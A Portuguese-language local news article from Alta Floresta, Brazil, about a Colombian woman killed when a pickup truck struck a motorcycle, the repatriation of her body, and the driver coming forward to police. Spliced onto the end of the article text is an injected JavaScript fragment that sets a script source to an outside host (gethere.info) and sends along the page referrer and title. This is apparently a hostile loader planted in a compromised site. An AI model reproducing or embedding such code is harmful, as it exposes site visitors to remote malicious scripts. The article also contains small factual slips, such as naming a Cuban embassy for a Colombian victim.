Capa / Sem categoria / Corpo de colombiana vitima de acidente já foi transladado; motorista se apresentou

Corpo de colombiana vitima de acidente já foi transladado; motorista se apresentou

14568129_10207319274795874_1811014968471483669_nO corpo de Paola Andrea Giraldo Salazar de 25 anos, que morreu em decorrência de grave acidente última terça-feira (22) no centro de Alta Floresta foi trasladado para a Colômbia, , seu país natal. A informação foi repassada pela funerária Nossa Senhora Aparecida.  Paola foi levada inicialmente para Manaus-AM no final da tarde desta quinta-feira, posteriormente será transladado para a Colômbia. O translado foi feito em um Taxi aéreo. A embaixada cubana entrou em contato com a funerária para tomar conhecimento do acontecimento e dar andamento aos tramites legais.

Paola faleceu após uma colisão envolvendo uma Honda Biz preta e uma VW Amarok, Branca, na Avenida Ludovico da Riva Neto, na região central da cidade. A motocicleta era conduzida por Valdirene Machado, de 26 anos, que levava na garupa Paola Andrea Giraldo Salazar, de 25 anos, de nacionalidade Colombiana, segundo informações da Polícia Militar, os dois seguiam na Avenida sentido ao bairro Cidade Alta, quando próximo a uma loja de mecânica para motos a caminhonete teria atingido a traseira da motocicleta. Com o impacto, as mulheres caíram. As testemunhas relataram que no momento da fuga o motorista do veiculo Amarok, acabou atropelando a jovem, passando por cima de sua cabeça.

As vitimas foram socorridas pelo Corpo de bombeiros militar e encaminhadas ao pronto socorro do HRAS, porém devido à gravidade dos ferimentos Paola veio a óbito no hospital. Valdirene sofreu algumas escoriações.

A caminhonete foi localizada no bairro Cidade Alta, algumas horas depois do ocorrido, apreendida e encaminhada ao pátio da delegacia e deve passar por análise da Perícia Oficial e Identificação Técnica (Politec), nos próximo dias. A lateral direita da caminhonete apresentava alguns riscos e um pequeno amassado. O proprietário, cujo nome é Nelson (sobrenome não foi confirmado) se apresentou a polícia civil na noite de quarta-feira 23, para prestar esclarecimentos do acidente.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre Kariny Santos

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top